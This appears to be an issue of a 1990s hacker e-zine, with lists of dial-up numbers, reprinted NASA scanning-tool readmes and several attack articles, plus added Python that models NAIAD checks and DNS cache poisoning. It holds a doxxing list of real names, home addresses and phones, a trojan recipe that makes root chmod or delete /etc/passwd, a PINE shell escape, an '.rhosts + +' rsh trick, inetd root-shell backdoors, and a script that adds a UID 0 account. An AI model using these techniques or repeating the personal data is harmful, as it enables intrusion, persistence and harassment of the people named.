961-32-00 ----------------------------------------------------------------------- www.Cityline.ru V34 ----------------------------------------------------------------------- 2587884 40 lines 9567759 20 2341901 10 2450070 10 2454414 10 9564787 Interport Mailbox ( t0ne ) 9560050 Unknown system ( t0ne ) 9585474 PassWord: _always_ BUSY #s ( unpluged ) 111-11xx 222-2222 980xxxxx .. 999xxxxx ----------------------------------------------------------------------- INTEL PORT : ----------------------------------------------------------------------- 956-4787 Main 434-1565 Registration 202-6934 Demo ----------------------------------------------------------------------- Dial-Ups ----------------------------------------------------------------------- 281-0201 975-0520 (37) 9270003 TYMUSA 956-3692 the same 956-0699 9600 Real Tymnet Voice 9563678 503/9563691 TYM-X25 Sync ----------------------------------------------------------------------- Youth Science Center Linux server ----------------------------------------------------------------------- Data lines: Line 1: 954-0664 (14400, 24h, UUPC only) 2: 954-0058 (14400, 21:00 - 09:00) 3: 954-0914 ( 9600, 21:00 - 09:00) 4: 954-0147 (33600, 24h, PPP only) 5: 954-0144 (33600, 24h, RAS only) 6: 954-0445 (33600, 24h, restricted) Voice Dmitry Ablov 9540012 7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex 742xxxx Gate to Iskra2 line. Call for 8-097-2nodes 913xxxx Gate to Iskra2 line. Call for 8-097-3nodes 2324626 Comstar Dialup 2329696 9560885 "The Microsoft Network is no longer providing MSN in Russia" ----------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-= Free 800 Services -=-=-=-=-=-=-=-=-=-=- ----------------------------------------------------------------------- Moscow #s 7473320 Rus MCI Operators in California 7473322 Eng connect me to Customer's Service in Russian 7473321 AT&T Operators in New-York 7473323 7473324 Sprint Global, Arizona, USA 7473325 Orua,Canada 7473326 Otele Code ? 
7473327 National Calling Center, UK 28 7473329 Japan 7473356 Sprint Calling Cards 57 7473359 France service 60 7473361 Italian service 7473363 Chili ? service National Russian #s 8-10 800 4977211 - ( AT&T); 8-10 800 4977222 - ( MCI); 8-10 800 4977255 - ( Sprint) ; 8-10 800 4977220 - (MCI ᪮筠 㦡); 8-10 800 4977233 - (Teleglob); 8-10 800 4977266 - ⠭(BT); 8-10 800 4977277 - ⠭( Mercuri); 8-10 800 4977288 - ; 8-10 800 4977181 - ( KDD); 8-10 800 4974358 - ﭤ( Telecom Finland); 8-10 800 4977032 - 죨 (Belgacom, ᯮ짮- 祪); 8-10 800 4977212 - 죨 ( Belgacom, १ - ); 8-10 800 4977039 - ⠫ (Iritel); 8-10 800 4977353 - ૠ ( Telecom Iriland); 8-10 800 4977156 - ; 8-10 800 4977165 - ; 8-10 800 4977141 - . =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. sIn inf0z part 3 : The CodeZero + Friends sIn are 0fficially property of the CodeZero. ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 
218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- Alias : JDKane Real Name : Kim Address : 327 E Park Road, Round Lake, IL 60073 USA Telephone : (847)546-9154 Email : ------------------------------------------------------------------------------- Alias : JeNnYGrRl Real Name : Jennifer Chambers Address : Kansas City, MO 61421 USA Telephone : Email : ------------------------------------------------------------------------------- We got more, but not complete, They can run, but they can never hide, http://www.codez.com/inf0z.html 2. The Codez That NASA Use : so1o w0wie, I got myself some eleet NASA system security juarez...And people have leeched them from me, like lame undernet groups with no skill. ::: LaRCSCAN ::: NAIAD ---These Are The *EXACT* Files Taken From The nasatool.zip.gz I have---------- (readme.larcscan) The LaRCSCAN program is a working prototype rather than a finished product, thus requiring a few explanations. SETTING UP ---------- LaRCSCAN is a combination of fifty script and c-language files. (No need to compile the c code, the scripts will do it ). To set up to run LaRCSCAN create a directory LARCSCAN in the users home directory. Copy LARCSCAN.tar into this directory. Do a tar -xf LARCSCAN.tar. This will create a 'project' directory containing all the script and 'C' files. Next create a directory 'LARCSCAN/data' . In this directory you wil create two files- 'hname1' and 'uname2'. These should be plain ascii text files. The first (hname1) will contain a list of all the target machine host names, one name per line. Example: viper machine2 dumbo (These may also use the longer format i.e. 
'dumbo.larc.nasa.gov'.)

The second (uname2) should contain a list of standard vendor account names you
wish to check. Example:

    guest
    tutor
    4Dgifts
    demo
    demos
    lp

There is an extensive list of these names in the file named 'acctlist'. We
normally run 6 to 8 of these each month, rotating through the list. They are
used in the 'rsh' attempts, and using too many can cause the process to be
extremely slow.

Before running LaRCSCAN, there are several places where code must be changed to
reflect the user, host and domain running the scan. The following changes
should be made:

FILE          CURRENT TEXT                  REPLACEMENT
----          ------------                  -----------
ftpsc         'jpark@bize'                  your username@your hostname
ftpss         'jpark@bize'                  your username@your hostname
getftp.sh     'jpark@bize'                  your username@your hostname
getftpss.sh   'jpark@bize'                  your username@your hostname
ftpsc         '#local=larc.nasa.gov'        '#local='your complete domain
ftpss         '#local=larc.nasa.gov'        '#local='your complete domain
hostsljc      '#local=larc.nasa.gov'        '#local='your complete domain
rshss         '#local=larc.nasa.gov'        '#local='your complete domain
rshsc         '#local=larc.nasa.gov'        '#local='your complete domain
shownlj       '#local=larc.nasa.gov'        '#local='your complete domain
line.c        'strncmp(pl.hdr,"larc",n)'    substitute the site portion of your
                                            domain name (lerc, arc, jpl, etc.)
                                            for 'larc'

These changes are necessary in order for your results to be accurate.

The C code is compiled (by the script files) using cc with the -o (next token
is output file) option. If this compiler is not used on the scanning machine,
you should be able to substitute the appropriate compiler command and option.
Compilation occurs from:

    exec1.sh
    exec2.sh
    rshsc
    rshss
    shownlj

RUNNING LaRCSCAN
----------------

LaRCSCAN can take quite a while (days) to run to completion, so it is
recommended that it be run in the background. We do this either with crontab
starting it at a specified time/date or through the use of 'nohup'. The command
that starts the process is 'sh tst1.sh' (in the project directory).
The necessary subdirectories and files will be created as needed.

RESULTS
-------

The first report (LARCSCAN/result/result.db) is a summary of the results from
each target machine. It starts with the date the scan began and the total
number of target hosts. The next line is the column header line, containing
the following abbreviations:

HTNAME - hostname
HUK    - host known (is the hostname an active host)
TFTP   - trivial ftp (is the trivial ftp utility active on this host)
FTP    - anonymous ftp (is anonymous ftp active on this host). There can be
         several valid responses in this column:
           No      - anonymous ftp is not active
           Yes_No  - anonymous ftp is active but no password file was captured
           Yes_Yes - anonymous ftp is active and a password file was captured
ALIAS  - were the 'decode' or 'uudecode' aliases present in the aliases file
SDM    - was the 'wiz' password present in the sendmail.cf file
SHADOW - was the captured password file a shadow password file. N/A is used
         when no password file was captured. (This is the only instance where
         'Yes' is a desired result.)
+LINE  - indicates a single '+' on a line by itself in the hosts.equiv file

The second report (LARCSCAN/result/result2.db) is a list of all hosts found to
have accounts with no password, followed by the unprotected account names. The
ACCTS_OFF and OFF columns will be used to represent hosts.equiv entries that
are located off-site and target hosts located off-site. Currently these
entries are not valid!

The last report (LARCSCAN/result/resultr1.db) contains a list of all file
systems exportable to the world.

Any specific questions or problems may be sent via E-mail to
j.w.park@larc.nasa.gov.

(readme.naiad)

The NASIRC Automated Inode Anomaly Detector (NAIAD)
---------------------------------------------------

Copyright 1996 Hughes STX Corporation

This software was developed by Hughes STX Corporation for the National
Aeronautics and Space Administration under contract NAS5-30440. An unlimited
license for use within NASA is granted.
Hughes STX Corporation makes no representation concerning the suitability of
this software for any particular purpose. It is provided "as is" without
express or implied warranty of any kind.

Author: Fred Blonder

NAIAD will traverse a specified directory and all its sub-directories, looking
for files meeting certain built-in criteria. If no directory is specified, it
starts at the current directory. Its purpose is to find evidence of attempted
or actual system tampering. The tests performed cannot easily be performed by
existing system commands such as "find". NAIAD is intended to be used in
conjunction with such programs and with checksumming programs.

The tests NAIAD performs are:

* Check for file names containing unprintable characters. These are sometimes
  used to hide illicit programs, or the output from them. They are also
  frequently created by fumble-fingered users, and are not necessarily a sign
  of a problem. Optionally, naiad will rename the file to something easier to
  type on a normal keyboard.

* List symbolic links, or just symbolic links to files whose name begins with
  a period. The exploitation of security holes in some programs involves
  placing symbolic links into a spool directory. NAIAD will help locate links
  in unexpected places.

* Lists old files whose inode has been altered recently. Some malicious
  programs attempt to hide the fact that they have altered a file by using the
  "utime" system call to alter the "last modified" time of the file. The inode
  also contains the "inode changed" time, which is not modifiable by this
  call; thus a file which has been tampered with to display an old
  modification time will still have a recent "inode changed" time. Of course,
  this can also be caused by someone using the "chmod" command.
  There are two parameters associated with this: the "window" is the amount
  of time within which the modification times may differ without being
  flagged (default is 30 minutes, which can be changed); and the "cutoff",
  which is the time within which the inode must have been modified for the
  file to be flagged (default is to not show files whose inodes have not been
  modified in the last week, which can be changed).

* Lists device files which are not under the /dev hierarchy, or ordinary files
  that are.

* Lists any files or directories whose mtime, atime or ctime are later than
  the current system time.

* Lists files which contain user-specified search-strings. This is similar to
  the command:

      find . -exec grep '{}' ';' -print

  but a little more efficient because there isn't a process started for each
  file, and naiad can be made to search only part of each file.

The output format is:

    MMM mmm iiiiiiiiii xxxxxxxxxxxxx: "<pathname>"

...where "MMM" is the major device number, "mmm" is the minor device number,
"iiiiiiiii" is the inode number, "xxxxxxxxxxx" is a comment, and "<pathname>"
is the pathname of the file. There may be additional information appended to
the line.

You will probably want to run as super-user so that NAIAD can access the
entire file system. It is passive, and will not alter anything it finds.

More detailed information may be found in the "naiad.1" file, which is part of
the naiad tarfile.

---These Are The *EXACT* Files Taken From The nasa.zip.gz I have---------------

So, looks as if NASA has some pretty neato detection juarez to use. I wouldn't
advise anyone to hack any *.nasa.gov system without knowing how to obtain root
and having mad skills to counteract these security measures, you have been
warned.

so1o.
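The tests in that readme are simple enough to reproduce. What follows is an added example written for this page (it is not NASA's NAIAD source): a scanner that applies NAIAD's tests to a directory tree with the readme's window and cutoff defaults, plus a demo() that builds a constructed tree of back-dated, future-dated, oddly named and linked files and returns what each test flags. All function names are this example's own.

```python
import os
import shutil
import stat
import tempfile
import time

WINDOW = 30 * 60          # mtime and ctime may differ this much before flagging
CUTOFF = 7 * 24 * 3600    # only consider inodes changed within the last week


def unprintable_name(name):
    """True if the file name contains a character outside printable ASCII."""
    return any(not 32 <= ord(c) < 127 for c in name)


def scan(root, now=None, window=WINDOW, cutoff=CUTOFF,
         dotlinks_only=False, search=(), search_limit=4096):
    """Walk root and return (test, path, detail) findings for NAIAD's tests."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: never follow the link
            except OSError:
                continue
            if unprintable_name(name):
                findings.append(("unprintable", path, repr(name)))
            if stat.S_ISLNK(st.st_mode):
                target = os.readlink(path)
                if not dotlinks_only or os.path.basename(target).startswith("."):
                    findings.append(("symlink", path, "-> " + target))
            # utime() can back-date mtime but never ctime, so an old mtime next
            # to a fresh ctime is the tampering signature (or just a chmod).
            if now - st.st_ctime <= cutoff and st.st_ctime - st.st_mtime > window:
                findings.append(("ctime-anomaly", path,
                                 "mtime %d ctime %d" % (st.st_mtime, st.st_ctime)))
            under_dev = path == "/dev" or path.startswith("/dev/")
            is_device = stat.S_ISCHR(st.st_mode) or stat.S_ISBLK(st.st_mode)
            if is_device and not under_dev:
                findings.append(("device-outside-dev", path, ""))
            if stat.S_ISREG(st.st_mode) and under_dev:
                findings.append(("regular-file-in-dev", path, ""))
            if max(st.st_mtime, st.st_atime, st.st_ctime) > now:
                findings.append(("future-time", path, ""))
            if search and stat.S_ISREG(st.st_mode):
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(search_limit)   # only part of each file
                except OSError:
                    continue
                for pat in search:
                    if pat in head:
                        findings.append(("contains", path, repr(pat)))
    return findings


def demo():
    """Build a constructed tree in a temp dir, scan it, return {(test, basename)}."""
    base = tempfile.mkdtemp()
    try:
        now = time.time()
        old = now - 100 * 24 * 3600
        p = os.path.join(base, "old_report.txt")   # back-dated mtime, fresh ctime
        open(p, "w").close()
        os.utime(p, (old, old))
        open(os.path.join(base, "\x01hidden"), "w").close()   # control char in name
        p = os.path.join(base, "future.log")        # timestamps an hour ahead
        open(p, "w").close()
        os.utime(p, (now + 3600, now + 3600))
        with open(os.path.join(base, ".rhosts"), "w") as fh:   # the "+ +" line
            fh.write("+ +\n")
        os.symlink(".rhosts", os.path.join(base, "spool_link"))  # link to a dot-file
        found = scan(base, now=time.time() + 1, dotlinks_only=True, search=(b"+ +",))
        return {(test, os.path.basename(path)) for test, path, _ in found}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for test, name in sorted(demo()):
        print("%-14s %s" % (test, name))
```

Running it as root over a real tree (scan("/", search=(b"+ +",))) gives the same five kinds of finding NAIAD reports, minus its renaming option.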
3. Rooting From Bin : so1o

This is something I was thinking a lot about the other day. I was on a System
V Release 4, and I had just performed the chkperm exploit, which only gives
bin access (uid=1 and gid=1) to the system, so even though I own all the files
in the /bin/ directory, I am still not root. Here is a very very simple
technique I developed for such occasions, this may come in useful one day for
someone, somewhere...

Write a program that you can get people to run; you could get hold of the
source for a common program, such as su or who or mount. Put this line in it
somewhere:

    if ( !strcmp(getlogin(),"root") ) system("whatever you want");

This checks to see if the root login is running your program. If he is, you
can have him execute any shell command you'd like. Here are some suggestions:

"chmod 666 /etc/passwd"

    /etc/passwd is the system's password file. The root owns this file.
    Normally, everyone can read it (the passwords are encrypted) but only the
    root can write to it. Take a look at it and see how it's formatted if you
    don't know already. This command makes it possible for you to now write to
    the file - i.e. create unlimited accounts for yourself and your friends.

"chmod 666 /etc/group"

    By adding yourself to some high-access groups, you can open many doors.

"chmod 666 /usr/lib/uucp/L.sys"

    Look for this file on your system if it is on the uucp net. It contains
    dialups and passwords to other systems on the net, and normally only the
    uucp administrator can read it. Find out who owns this file and get him to
    unknowingly execute a program to unlock it for you.

"rm /etc/passwd"

    If you can get the root to execute this command, the system's passwd file
    will be removed and the system will go down and will not come up for some
    time to come. This is very destructive and evil, but pointless; if you do
    want to damage a system, at least use your imagination.

If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow.
If the hidden purpose is something major (such as unlocking the user's mbox or
deleting all of his files or something) this program shouldn't be a program
that people will be running a lot (such as a popular computer game) - once
people discover that their files are public access the source of the problem
will be discovered quite easily. Save this purpose for a 'test' program (such
as a game you're in the process of writing) that you ask individual people to
run via mail or 'chatting' with them. As I said, this 'test' program can bomb
or print a phony error message after completing its task, and you will just
tell the person "well, I guess it needs more work", wait until they log off,
and then read whatever file of theirs that you've unlocked.

If your trojan horse program's sole purpose is to catch a specific user
running it - such as the root or other high-powered user - you can put the
code to do so in a program that will be run a lot by various users of the
system. Your modification will remain dormant until he runs it.

If you can't find the source to 'star trek' or whatever in C, just learn C and
convert something from Pascal. It can't hurt to learn C as it's a great
language. We've just seen what it can do on a UNIX system.

Once you've caught the root (i.e. you can now modify the /etc/passwd file)
remove the spurious code from your trojan horse program and you'll never be
caught.

so1o.

4. DNS Spoofing : so1o

You can now use a new DNS spoofing technique originally developed by johan. I
have seen this technique often applied to IRC, and prym was one of the first
to use the technique for that purpose.

Here is a basic introduction into the DNS concept.
--------------------------------------------------

DNS stands for Domain Name Server, although you may hear it referred to as
Dynamic Name Server.
DNS servers are used so that instead of everyone having numeric IPs for their
websites and shit, they can use a DNS so that a client can 'lookup' the name
(eatme.com for example) to the numeric IP. Basically, a DNS server is a
computer which is running a nameserver daemon, typically listening on UDP port
53.

When a new domain is set up, the domain is registered with Internic. Internic
then tells its clients who has authority over the domains registered with it.

For example, say 1.2.3.4 wanted to resolve the address for peachie.com and
1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric
IP for peachie.com was, so 1.3.3.7 would ask Internic who had authority over
peachie.com, and Internic might reply with ns.peachie.com. So then 1.3.3.7
would ask ns.peachie.com what the numeric IP for peachie.com was. Then
ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com was
4.3.2.1, and 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the name would
be resolved.

DNS servers generally cache addresses that are looked up by their clients. So
if 1.2.3.4 were to ask 1.3.3.7 what the address for peachie.com was again,
1.3.3.7 would not ask Internic etc.; instead it would take the IP that it had
resolved earlier and say that the numeric IP for peachie.com is 4.3.2.1.

The funny part is that the DNS server doesn't do a lot of checking when
another nameserver replies to its query. It basically just tells the client
what it was told at an earlier point and caches it in the same way. This is
why we can spoof using such a technique, but we would need root access to a
nameserver first; this is one of the biggest setbacks...

How to spoof your DNS.
----------------------

Let's say we're sitting on ns.peachie.com with root, and we have authority for
all of peachie.com. We want to cache our box's address 2.2.2.2 on the remote
nameserver ns.eatme.org so that we can connect to eatme.org with the address of
trusted.eatme.org.
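Before the spoofed exchange is walked through, here is a small model of the resolver cache in the scenario just set up, added for this page and not code from the article. It uses the article's own names and addresses and contrasts a cache that stores whatever the remote nameserver answers with one that keeps only records inside the answering server's bailiwick (the ranking rule of RFC 2181 section 5.4.1), then runs the PTR-then-A check that rhosts-style trust relies on; the record tuples and class names are this example's simplification.

```python
def in_bailiwick(owner, zone):
    """True if owner is the zone apex or a name below it (case-insensitive)."""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


def reverse_name(ip):
    """2.2.2.2 -> 2.2.2.2.in-addr.arpa (octets reversed); the PTR owner name."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"


class Cache:
    """A resolver cache; records are (owner, type) -> rdata, one value each."""

    def __init__(self, check_bailiwick):
        self.check_bailiwick = check_bailiwick
        self.records = {}
        self.rejected = []

    def ingest(self, server_zone, reply):
        """Store a reply from the server authoritative for server_zone."""
        for owner, rtype, rdata in reply:
            if self.check_bailiwick and not in_bailiwick(owner, server_zone):
                self.rejected.append((owner, rtype, rdata))   # out of bailiwick
                continue
            self.records[(owner.lower(), rtype)] = rdata

    def lookup(self, owner, rtype):
        return self.records.get((owner.lower(), rtype))


# Constructed reply from ns.peachie.com to "A peachie.com?": the honest answer
# plus two records about names it has no authority over.
SPOOFED_REPLY = [
    ("peachie.com", "A", "4.3.2.1"),
    (reverse_name("2.2.2.2"), "PTR", "trusted.eatme.org"),
    ("trusted.eatme.org", "A", "2.2.2.2"),
]


def rhosts_style_check(cache, client_ip):
    """What a host like eatme.org does with a connecting client: look up the PTR
    for its address, then the A record of that name, and accept the name only
    if the two agree. Returns the accepted host name or None."""
    name = cache.lookup(reverse_name(client_ip), "PTR")
    if name is not None and cache.lookup(name, "A") == client_ip:
        return name
    return None


def run(check_bailiwick):
    """ns.eatme.org resolves peachie.com, then 2.2.2.2 connects to eatme.org."""
    cache = Cache(check_bailiwick)
    cache.ingest("peachie.com", SPOOFED_REPLY)
    return (cache.lookup("peachie.com", "A"),
            rhosts_style_check(cache, "2.2.2.2"),
            len(cache.rejected))


if __name__ == "__main__":
    print("naive cache    :", run(False))   # ('4.3.2.1', 'trusted.eatme.org', 0)
    print("bailiwick check:", run(True))    # ('4.3.2.1', None, 2)
```

With the naive cache both planted records survive and 2.2.2.2 passes as trusted.eatme.org; with the bailiwick check only the peachie.com answer is kept and the reverse lookup finds nothing.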
We could write a program that listens for DNS queries and replies with false
information. Sitting on ns.peachie.com we could look up peachie.com on the
nameserver ns.eatme.org. ns.eatme.org would ask Internic who had authority for
peachie.com, and it would reply to ns.eatme.org that ns.peachie.com had
authority over peachie.com. Then ns.eatme.org would ask ns.peachie.com what
the address for peachie.com was. If we were running a normal DNS then it would
tell ns.eatme.org that the address for peachie.com was 4.3.2.1, but we aren't.
We'll say that ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is
trusted.eatme.org and the address for trusted.eatme.org is 2.2.2.2.

This exploits the failure to check a few things on the DNS. Basically
ns.eatme.org asked what the numeric IP for peachie.com was, and we told it that
the reverse of 2.2.2.2 is trusted.eatme.org and that the IP of trusted.eatme.org
is 2.2.2.2. They asked a question to which we responded with two answers to a
different question entirely.

Now we would simply connect to eatme.org from 2.2.2.2, and eatme.org would ask
ns.eatme.org for the reverse of 2.2.2.2; in its cache it would find
trusted.eatme.org and it would reply with that answer. Then it would ask for
the address of trusted.eatme.org and it would reply with 2.2.2.2. You would
then be connected to eatme.org from trusted.eatme.org, and in effect DNS
spoofing.

That's all there is to it, it may be a bit heavy for some people.

so1o

5. FreeNet : TrN

Breaking security on restricted shells and freenets.

What many system administrators fail to realize is that by setting up shells
and security on their applications and systems, and generally trying to lock
users in a freenet menu environment, it is almost impossible to fully examine
every program. Many programs allow you to escape to shells, even in secure
mode, especially the older ones.
There is a longstanding bug in the gopher application, used by many freenets,
that allows you to start up a gopher server, where an entry is created such as
";sh". Following this entry provides a shell. This is the main reason why the
original gopher client is no longer in use. A "l;rm -rf *" was just as easy.

In today's world, the biggest problem is that freenets usually allow you to
edit files. If this is the case, you almost have a 100% chance of getting into
a real shell. What you first have to do is see if you can go through the menu
system to edit a file. If you can't, that is cool too. We are going to show
you how to get a shell out of PINE. It doesn't matter which version, this
works all the way up to 3.96.

Anyway, like I was saying, you should see if you can either a) edit a file, or
b) upload a file. I'm almost sure you can do either. So, let's start a little
session here. First, you have to edit your .pinerc. If you can't, download it
(or get it from the PINE package), make the changes, and reupload it. What is
important is that you edit the feature-list= command, and have it read
something similar to this:

    feature-list=enable-alternate-editor-cmd, enable-unix-pipe-cmd

After setting this correctly, go further in the file until you find the
editor= command. It is stated that the editor is normally set to sh, and
invoked via _^ [Control-Shift-Dash]. Do you get the idea yet? Set the line to
read

    editor=sh

and then save the file. Now for the fun part. Start up pine, and choose
Compose Message. Erase all the To/Cc/Att/Sub headers, and make the message
text blank, except for the word "sh" (without the quotes) on a single line.
After this is done, press the alternate editor hotkey (^_). Here is what
happens:

    To      :
    Cc      :
    Attchmnt:
    Subject :
    ----- Message Text -----
    sh
    $

Kinda neat. That little $ is the sign that it all worked.
What you probably want to do is execute some of the standard commands that
tell you a little about where you are:

    $ uname -a ; uptime ; /sbin/ifconfig -a
    SunOS pb 4.1.3_U1 1 sun4m
    12:14am  up 47 days, 12:18,  24 users,  load average: 2.71
    le0: flags=63 inet 199.227.192.35 ffffff00 199.227.192.0
    lo0: flags=49 inet 127.0.0.1 ff000000

Then a w ; ps -aux would be nice. It can tell you a little about what is going
on, and what is safe to do the things you want. You should probably log on
late at night, compile slirp if it is only a shell/vt dialin, and then check
the system for vulnerabilities, unshadowed passwords, etc.

I've notified my freenet of their problems, but they don't seem to care. Maybe
now they will. Ok sysadmins, fix up your freenets, and hackers... Hack the
planet. :-)

This article by TrN of The CodeZero. I'll have more interesting information on
the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by
e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web
page, as it has other security related information. LaterZ.

One other thing to consider: if ports 514 / 512 are open, then you can try
creating an .rhosts file in your home directory containing "+ +", then use..

    rsh -l loginhere systemhere.com csh -i

...and you will get a shell -- so1o

6. Backdoors Revised : Blk-Majik

Disclaimer: If you do anything mentioned in this article, it is your own fault
and any trouble you manage to get into is your own responsibility, not mine.
But what am I thinking... like any of you lamers can root a shell :).

gr33tz: A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown,
pack, plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly
for making this document possible and helping me out!

=============================================================================
section 1:
=============================================================================

What is a back door? :
Well, kiddies, a backdoor is just a way to remotely get into a shell without
being noticed or sometimes logged. This can be done by adding an extra telnet
port to the server. I will show you a few ways to set up the port, and also
how to keep it up even after the admin finds it.

so1o had a section in a back issue with a back door using the inetd.conf file
where you had to end all commands with a ";". Well, that annoyed the hell out
of me so I have modified his technique.

=============================================================================
section 2:
=============================================================================

What you need :

Basically, you need root on a shell to start (and a Unix based OS). After
that, you will need a good editor... say pico or vi. Most of you #shells
wh0res need, but lack, this important ingredient.... a fucking brain.

=============================================================================
section 3:
=============================================================================

Understanding the technique :

After you checked your head, editor, whoami, etc, you are all set. Ok, this is
what you look for:

    /etc/services      This file lets you find a port
    /etc/inetd.conf    This is where the backdoor will be

Ok, in the /etc/services file, you will see something like this:

    tcpmux          1/tcp     #TCP Port Service Multiplexer
    tcpmux          1/udp     #TCP Port Service Multiplexer
    compressnet     2/tcp     #Management Utility
    compressnet     2/udp     #Management Utility
    compressnet     3/tcp     #Compression Process
    compressnet     3/udp     #Compression Process

Ok, what the fuck is that? I'll explain it with this example:

    ftp             21/tcp    #File Transfer [Control]
    ftp             21/udp    #File Transfer [Control]
    [1]            [2]/[3]    #[      4       ]

1: The name of the service on the system.
2: The port that the system uses for the service.
3: The protocol (going to be tcp. You can choose either tcp or udp.)
4: A description of what the service is used for.

Aight, that's the services file... you will need this later.
Now look at the /etc/inetd.conf file. inetd is an Internet daemon that listens
for TCP connection requests and UDP ports and then spawns the program when a
connection request is made. It will look like this:

    ftp     stream  tcp  nowait  root  /usr/libexec/tcpd  ftpd -l -A
    telnet  stream  tcp  nowait  root  /usr/libexec/tcpd  telnetd
    shell   stream  tcp  nowait  root  /usr/libexec/tcpd  rshd
    login   stream  tcp  nowait  root  /usr/libexec/tcpd  rlogind -a
    exec    stream  tcp  nowait  root  /usr/libexec/tcpd  rexecd

Let me explain it:

    ftp     stream  tcp  nowait  root  /usr/libexec/tcpd  ftpd -l -A
    [1]     [ 2 ]   [3]  [ 4 ]   [5]   [       6       ]  [   7    ]

1: Name of daemon in the services file. It tells inetd what to look for in
   /etc/services to see what port to use when connecting.
2: Type of socket connection that the daemon will accept.
3: Protocol field, which is always TCP or UDP.
4: How long to delay connection.
5: User to run the daemon as (used with uid/gid permissions etc.)
6: What program will keep the connection.
7: The actual command or daemon.

Ok, so what that does is make a port for ftp (port 21, as defined in the
services file). It has a stream/tcp connection and doesn't wait for a prompt.
The user is of root access and uses /usr/libexec/tcpd (but limited commands).
Ok, now u know what the shit is for, next step...

=============================================================================
section 4:
=============================================================================

Installing the backdoor :

Backdoor I : Using /etc/inetd.conf and /etc/services
----------------------------------------------------

method 1 :
----------

Ok, now go back to the /etc/services file. Look at it and find a service you
think the admin will not notice, and that is not in use. Remember the name of
the service. Now, go to the inetd.conf file. Go to a place with all the
service names, where the 1 is in the above example. Add your service somewhere
so it is hidden within the others. For 2, put the port of the service. 3 is
tcp, duh.
4 is nowait. 5 will be root, so u get root access. 6 is going to be /bin/sh or
whatever you like. 7 has to be 6 -i.. ex: if 6 is /bin/sh, 7 is /bin/sh -i.
Here is an example:

    ftp     stream  tcp  nowait  root  /bin/sh  sh -i

Ok, now you have to restart inetd. Do this by typing (as root) :

    killall -HUP inetd

Ok, now let's test it. From a different system...

    telnet victim.server.com 21
    Trying 123.456.78.9...
    Connected to comp.com
    Escape character is '^]'.
    bash#
    bash# whoami
    root
    bash#

tip: do NOT use the ftp port... it is just used too often. Pick a service that
is not used a lot. It will help you keep the backdoor running.

method 2:
---------

If you are willing, you can add your own service to the services file. This is
easy.. say your services file is like this:

    netbios-ssn     139/tcp   nbssn
    imap            143/tcp             # imap network mail protocol
    NeWS            144/tcp   news      # Window System
    snmp            161/udp

Ok, look at the ports..... see how they skip a few? Well, let's fill 1 of them
up...

    netbios-ssn     139/tcp   nbssn
    suled           142/tcp   suled
    imap            143/tcp             # imap network mail protocol
    NeWS            144/tcp   news      # Window System
    snmp            161/udp

Notice the suled service... I added that to the /etc/services. Ok, now to the
/etc/inetd.conf file:

    ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
    telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
    gopher  stream  tcp  nowait  root  /usr/sbin/tcpd  gn

...Here we go!!

    ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
    telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
    gopher  stream  tcp  nowait  root  /usr/sbin/tcpd  gn
    suled   stream  tcp  nowait  root  /bin/sh         sh -i

Ok, now restart inetd like I said how to before... You're all set, telnet
localhost and test it!@~#

Backdoor II: Da beauty of CRON
-------------------------------

Ok, cron trojans are good for keeping root if the admin kills the backdoor. A
cron is a timed daemon. It consists of hours, minutes, etc. It will make the
system automatically issue a command on the shell at a given time of your
choice...
Type crontab in the shell. It will tell you how to list, run and remove crons.
You will like to look at /var/spool/cron/crontabs/root. This is what the crons
will look like:

    0   0   *   *   1   /usr/bin/updatedb
   [1] [2] [3] [4] [5]  [       6       ]

1: minute, 0-59
2: hour, 0-23
3: day of month, 1-31
4: month of year, 1-12
5: day of week, 0-6
6: command to execute

The example above is issued at midnight on Mondays. If you want to exploit the
cron, simply add a cron line to /var/spool/cron/crontabs/root, i.e.: if you use
the UID 0 account (as seen later), you can make a cron to see if the UID 0
account is still alive. If root killed it, the cron can re-add it!

...This will make the UID 0 account, just for back-up:

Cron #1
-------

newuser.sh
----------

    #!/bin/csh
    # Inserts a UID 0 account into the middle of the passwd file.
    # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
    # ('set' and '@' are csh builtins, so this runs under csh, not sh.)
    # daemon9@netcom.com
    set linecount = `wc -l /etc/passwd`
    cd                            # Do this at home.
    cp /etc/passwd ./temppass     # Safety first.
    echo passwd file has $linecount[1] lines.
    @ linecount[1] /= 2
    @ linecount[1] += 1           # we only want 2 temp files
    echo Creating two files, $linecount[1] lines each \(or approximately that\).
    split -$linecount[1] ./temppass
    # passwd string optional
    echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd         # or whatever it was beforehand
    rm ./xa* ./temppass
